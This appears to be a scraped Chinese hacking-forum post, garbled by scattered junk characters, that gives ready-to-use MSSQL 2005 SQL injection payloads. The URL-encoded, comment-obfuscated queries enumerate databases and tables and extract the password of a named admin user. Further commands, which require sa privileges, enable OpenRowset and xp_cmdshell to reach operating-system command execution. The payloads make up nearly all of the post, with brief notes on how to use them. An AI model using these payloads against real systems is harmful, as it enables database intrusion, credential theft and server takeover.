( y! L! X3 n1 M6 x+ v. ]: Q' e P) v
9 a2 _' c r0 t! e[Copy to clipboard]CODE:
" C2 ^8 P- H3 [$ @$ X+ l/**/and/**/(select/**/top/**/1/**/isnull(cast([name]/**/as/**/nvarchar(500)),char(32))%2bchar(124)/**/from/**/[master].[dbo].[sysdatabases]/**/where/**/dbid/**/in/**/(select/**/top/**/1/**/dbid/**/from/**/[master].[dbo].[sysdatabases]/**/order/**/by/**/dbid/**/desc))%3d0--
5 k& ~% w1 T/ Y
# y7 B, ?6 ?' b f. k爆表语句,somedb部份是所要列的数据库,红色数字1累加
3 _' Y) n( e3 t! X: N$ h& C! I T0 [7 f, @: A$ x* o( \" n. q
( z, o; W6 }* d" a% ^# {6 [; G% [[Copy to clipboard]CODE:
( L! w# V, Q! @9 e3 D/**/and/**/(select/**/top/**/1/**/cast(name/**/as/**/varchar(200))/**/from/**/(select/**/top/**/1/**/name/**/from/**/somedb.sys.all_objects/**/where/**/type%3dchar(85)/**/order/**/by/**/name)/**/t/**/order/**/by/**/name/**/desc)%3d0--
/ o+ D* {# W; r% D; q% b8 k, F1 z0 o& r8 f; D; u7 J
爆字段语句,爆表admin里user='icerover'的密码段
, G( o1 N7 a+ a! p/ f- c0 l
# o8 h0 u5 s* {6 _* d3 v3 G( m! ~5 h9 _& f* i; X5 \ l( `
[Copy to clipboard]CODE:
& ? F0 z) \$ ~% n9 r" O**/And/**/(Select/**/Top/**/1/**/isNull(cast([password]/**/as/**/varchar(2000)),char(32))%2bchar(124)/**/From/**/(Select/**/Top/**/1/**/[password]/**/From/**/[somedb]..[admin]/**/Where/**/user='icerover'/**/Order/**/by/**/[password])/**/T/**/Order/**/by/**/[password]Desc)%3d0--
5 @3 Y) ~, x% y" _
% n: h9 V% U% A6 dmssql2005默认没有开xp_cmdshell的,openrowset也不能用2 `+ Z: f, V1 Z' _% t
如果是sa权限,可以这样来开启! E' s' u$ u2 \
开启openrowset/ [: r" P: _; V2 ^4 l0 v" t: S2 i
9 ^+ a1 T! P/ Z
7 x( |: P( ~9 i! K
[Copy to clipboard]CODE:
, M0 O: `! k! r2 N) p/**/sp_configure/**/'show/**/advanced/**/options',/**/1;RECONFIGURE;--
( f% I5 r W4 y$ @4 H0 }# x/**/sp_configure/**/'Ad/**/Hoc/**/Distributed/**/Queries',/**/1;RECONFIGURE;--
9 T$ e# B+ i, M& Z" t6 d, U( d& A9 |7 W+ c; L9 q
开启xp_cmdshell# y' P0 O; a# n3 b! c
2 w6 N3 ?) _3 f% i, [
% U; X- g$ L/ s- ][Copy to clipboard]CODE:
: o( ]+ s3 A, ]# Z+ xEXEC/**/sp_configure/**/'Ad/**/Hoc/**/Distributed/**/Queries',1;RECONFIGURE;--6 g( ?9 O1 k2 m" [# W7 [
EXEC/**/sp_configure/**/'show/**/advanced/**/options',1;RECONFIGURE;EXEC/**/sp_configure/**/'xp_cmdshell',1;RECONFIGURE;--
) H5 P& f( x) _% _$ i( m
/ g! j+ d5 H4 i* lok,over~~晚安- B, }" _, t9 r' {+ v5 ]1 w
|